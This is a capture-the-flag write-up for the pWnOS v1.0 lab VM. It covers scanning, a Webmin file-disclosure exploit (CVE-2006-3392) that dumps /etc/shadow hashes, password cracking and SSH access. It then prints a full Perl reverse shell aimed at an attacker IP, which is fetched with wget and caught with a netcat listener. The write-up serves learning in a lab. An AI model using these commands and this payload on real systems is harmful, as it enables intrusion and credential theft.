Author: u$3r_h0n3$t # pWnOs WriteUps 2023 --- **Steps for Setting up the VM** Download the pwnOs from this link https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip 1 - Unzip and move the folder to C disk. Launch the VM. If Vmware asks whether you copied or moved this virtual machine on first boot, click **MOVED!** This will not mess up your network settings. Then turn it off-> Go to settings and enable it to NAT and launch it. Launch your attack machine. --- # Information Gathering ## Finding the IP For this i use **netdiscover** ```shell= netdiscover -i eth0 -f ```  ## Enumerating ports I run a nmap scan ```shell= nmap -sT -Pn -n -vv 192.168.136.140 -p- -sC --script=vuln ``` I get a lot of info here ```shell= PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 80/tcp open http syn-ack |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-trace: TRACE is enabled | Headers: | Date: Mon, 13 Nov 2023 14:23:11 GMT | Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6 | Connection: close | Transfer-Encoding: chunked |_Content-Type: message/http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-jsonp-detection: Couldn't find any JSONP endpoints. | http-enum: | /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6' | /index/: Potentially interesting folder |_ /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6' 139/tcp open netbios-ssn syn-ack 445/tcp open microsoft-ds syn-ack 10000/tcp open snet-sensor-mgmt syn-ack | http-vuln-cve2006-3392: | VULNERABLE: | Webmin File Disclosure | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2006-3392 | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences | to bypass the removal of "../" directory traversal sequences. | | Disclosure date: 2006-06-29 | References: | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392 |_ http://www.exploit-db.com/exploits/1997/ Host script results: |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug) |_smb-vuln-ms10-061: false |_smb-vuln-ms10-054: false ``` ## Directory Enumeration with Gobuster ```shell= gobuster dir -u http://192.168.136.140:80 -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.136.140:80 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htaccess (Status: 403) [Size: 310] /.htpasswd (Status: 403) [Size: 310] /cgi-bin/ (Status: 403) [Size: 309] /index (Status: 200) [Size: 295] /index1 (Status: 200) [Size: 1104] /index2 (Status: 200) [Size: 156] /php (Status: 301) [Size: 334] [--> http://192.168.136.140/php/] /server-status (Status: 403) [Size: 314] Progress: 20469 / 20470 (100.00%) =============================================================== Finished =============================================================== ``` To make sure i get ll the info i need.I do a Nikto scann to ```shell= Nikto -h http://192.168.136.140 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.136.140 + Target Hostname: 192.168.136.140 + Target Port: 80 + Start Time: 2023-11-13 11:29:25 (GMT-6) --------------------------------------------------------------------------- + Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6 + /: Retrieved x-powered-by header: PHP/5.2.3-1ubuntu6. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + Apache/2.2.4 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + PHP/5.2.3-1ubuntu6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch. + /index: Uncommon header 'tcn' found, with contents: list. + /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275 + PHP/5.2 - PHP 3/4/5 and 7.0 are End of Life products without support. + OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE . + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing + /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184 + /php/: Directory indexing found. + /php/: This might be interesting. + /icons/: Directory indexing found. + /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 294754, size: 4872, mtime: Thu Jun 24 14:46:08 2010. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + /index1.php: PHP include error may indicate local or remote file inclusion is possible. + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials. + 8908 requests: 0 error(s) and 22 item(s) reported on remote host + End Time: 2023-11-13 11:29:54 (GMT-6) (29 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` --- # Method A # File inclusion and getting the hashes  The URLsuggests that it might be a security vulnerability known as "Local File Inclusion" (LFI). If we add the /etc/passwd  Base URL and Script: http://192.168.136.140/index1.php This part indicates that a request is being made to a PHP script (index1.php) hosted on a server with the IP address 192.168.136.140. Query Parameters: ?help=true&connect=/etc/passwd. ?: This character marks the beginning of the query string in a URL. help=true: This is a key-value pair in the query string. &: This character separates multiple parameters in a query string. connect=/etc/passwd: This is another key-value pair. The connect parameter is being passed the path /etc/passwd. Local File Inclusion (LFI): /etc/passwd: This is a standard file in Unix and Linux systems that contains user account information. It's often targeted in LFI attacks because it can reveal usernames and other potentially sensitive data about the system's users.  The hashes will not be found here , there are other ways of getting them. --- # Teqnique 1 -> Metasploit on webmin Earlier in the port enumeration we found this. ```shell= 10000/tcp open snet-sensor-mgmt syn-ack | http-vuln-cve2006-3392: | VULNERABLE: | Webmin File Disclosure | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2006-3392 | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences | to bypass the removal of "../" directory traversal sequences. | | Disclosure date: 2006-06-29 | References: | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392 |_ http://www.exploit-db.com/exploits/1997/ ``` **Using Metasploit** We want to get the hashes from the users we found. ```cmd= msf6 > search webmin 1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure msf6 > use auxiliary/admin/webmin/file_disclosure msf6 auxiliary(admin/webmin/file_disclosure) > set RHOSTS 192.168.136.140 RHOSTS => 192.168.136.140 msf6 auxiliary(admin/webmin/file_disclosure) > set RPATH /etc/shadow RPATH => /etc/shadow msf6 auxiliary(admin/webmin/file_disclosure) > run [*] Running module against 192.168.136.140 [*] Attempting to retrieve /etc/shadow... [*] The server returned: 200 Document follows root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7::: daemon:*:14040:0:99999:7::: bin:*:14040:0:99999:7::: sys:*:14040:0:99999:7::: sync:*:14040:0:99999:7::: games:*:14040:0:99999:7::: man:*:14040:0:99999:7::: lp:*:14040:0:99999:7::: mail:*:14040:0:99999:7::: news:*:14040:0:99999:7::: uucp:*:14040:0:99999:7::: proxy:*:14040:0:99999:7::: www-data:*:14040:0:99999:7::: backup:*:14040:0:99999:7::: list:*:14040:0:99999:7::: irc:*:14040:0:99999:7::: gnats:*:14040:0:99999:7::: nobody:*:14040:0:99999:7::: dhcp:!:14040:0:99999:7::: syslog:!:14040:0:99999:7::: klog:!:14040:0:99999:7::: mysql:!:14040:0:99999:7::: sshd:!:14040:0:99999:7::: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7::: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7::: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7::: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7::: [*] Auxiliary module execution completed ``` There we have the hashes. Short explained -> we now that in Linux, users are listed in /etc/passwd/ Pasword hashes can be listed in /etc/shadow/ that can only be accessed in root. So why can we access theese if we are not root? for more info see **CVE-2006-3392** # Technique 2 -> Manual exposure After scraping the web i found a known vulnerability in Webmin/Usermin can be exploited to read files from a server without requiring authentication, hence the significance of 'unauthenticated' in this context. There is a script found here: https://www.exploit-db.com/exploits/2017 erl exploit script for a specific vulnerability in Webmin and Usermin versions prior to 1.290 and 1.220, respectively. This script demonstrates how the vulnerability can be exploited to perform arbitrary file disclosure. Exploit Mechanism: It constructs a URL with the /unauthenticated/ path and appends a series of ..%01 sequences. This is the directory traversal technique used to move up in the directory hierarchy and bypass security controls. It then appends the desired filename to this path, aiming to access that file. So we can inject a payload manually on the url   Theese are the same hashes that we got from the previous technique # Cracking the hashes Theese are the hashes ```shell= root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7::: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7::: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7::: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7::: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7::: ``` I put them all in one file named hashes.txt  John cracked one **h4ckm3 (vmware)** --- # Choose your rabbithole  # RabbitHole 1 -> The Shellshock way We cant try accessing ssh with wmware user. ```shell= ssh wmware@192.168.136.140 Unable to negotiate with 192.168.136.140 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss :( ``` ## Access SSH Server I can temporarily allow these older key types in your SSH client by specifying the key type in your SSH command. However, be aware that using older, less secure key types can expose you to certain security risks. This command tells your SSH client to accept ssh-rsa keys for this session ```shell= ssh -oHostKeyAlgorithms=+ssh-rsa vmware@192.168.136.140 vmware@192.168.136.140's password: Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Jun 20 14:35:37 2008 -> ||| LOL, thats a long time ago vmware@ubuntuvm:~$ ``` We are inside the server now. ```shell= vmware@ubuntuvm:~$ whoami vmware vmware@ubuntuvm:~$ id uid=1000(vmware) gid=1000(vmware) groups=4(adm),20(dialout),24(cdrom),25(floppy), 29(audio),30(dip),44(video),46(plugdev),104(scanner) ,111(lpadmin),112(admin),1000(vmware) vmware@ubuntuvm:~$ ``` But we are not root. We know that the Webmin is running in root. ## Create a webshell with Perl So first, i know that Kali has a few webshells. The reverse shell we are going to use is a Perl script. It can be located here /usr/share/webshells/perl I copy the script, place it in the folder that i am working from, and change the name to **tmp_file.cgi** Inside the script we need to put our Kali address we get with ifconfig, and specify the port, i will use 443. ```perl= Copyright (C) 2006 pentestmonkey@pentestmonkey.net use strict; use Socket; use FileHandle; use POSIX; my $VERSION = "1.0"; # Where to send the reverse shell. Change these. my $ip = '192.168.136.129'; my $port = 443; # Options my $daemon = 1; my $auth = 0; # 0 means authentication is disabled and any # source IP can access the reverse shell my $authorised_client_pattern = qr(^127\.0\.0\.1$); # Declarations my $global_page = ""; my $fake_process_name = "/usr/sbin/apache"; # Change the process name to be less conspicious $0 = "[httpd]"; # Authenticate based on source IP address if required if (defined($ENV{'REMOTE_ADDR'})) { cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); if ($auth) { unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { cgiprint("ERROR: Your client isn't authorised to view this page"); cgiexit(); } } } elsif ($auth) { cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); cgiexit(0); } # Background and dissociate from parent process if required if ($daemon) { my $pid = fork(); if ($pid) { cgiexit(0); # parent exits } setsid(); chdir('/'); umask(0); } # Make TCP connection for reverse shell socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { cgiprint("Sent reverse shell to $ip:$port"); cgiprintpage(); } else { cgiprint("Couldn't open reverse shell to $ip:$port: $!"); cgiexit(); } # Redirect STDIN, STDOUT and STDERR to the TCP connection open(STDIN, ">&SOCK"); open(STDOUT,">&SOCK"); open(STDERR,">&SOCK"); $ENV{'HISTFILE'} = '/dev/null'; system("w;uname -a;id;pwd"); exec({"/bin/sh"} ($fake_process_name, "-i")); # Wrapper around print sub cgiprint { my $line = shift; $line .= "<p>\n"; $global_page .= $line; } # Wrapper around exit sub cgiexit { cgiprintpage(); exit 0; # 0 to ensure we don't give a 500 response. } # Form HTTP response using all the messages gathered by cgiprint so far sub cgiprintpage { print "Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page; } ``` ## Create a http server with python When i have this i open up a new window and i will make a http server to fetch a file into the server . ```python= python -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... ``` From the ssh server that i am connected in i will use the wget command togeter with the ip from my kali and the listening port from the python server. ## Wget the Perl reverse shell script into the SSH SERVER ```shell= vmware@ubuntuvm:~$ wget http://192.168.136.129:8000/tmp_file.cgi --11:33:10-- http://192.168.136.129:8000/tmp_file.cgi => `tmp_file.cgi' Connecting to 192.168.136.129:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 3,717 (3.6K) [application/octet-stream] 100%[==========================================================>] 3,717 --.--K/s 11:33:11 (140.99 MB/s) - `tmp_file.cgi' saved [3717/3717] vmware@ubuntuvm:~$ ls tmp_file.cgi ``` This file need to be executable this we can do with  Now i make a listener with netcat and it will listen i port 443 ```shell= root@kali:~/Documents/CTF/pwnOs# nc -lvp 443 listening on [any] 443 ... ``` ## Trigger the exploit I go back to the webpage and type navigate to the directory with the url triggering the cgi script in the server triggering a privilege escalation.   --- # Rabbithole 2 to be continued ------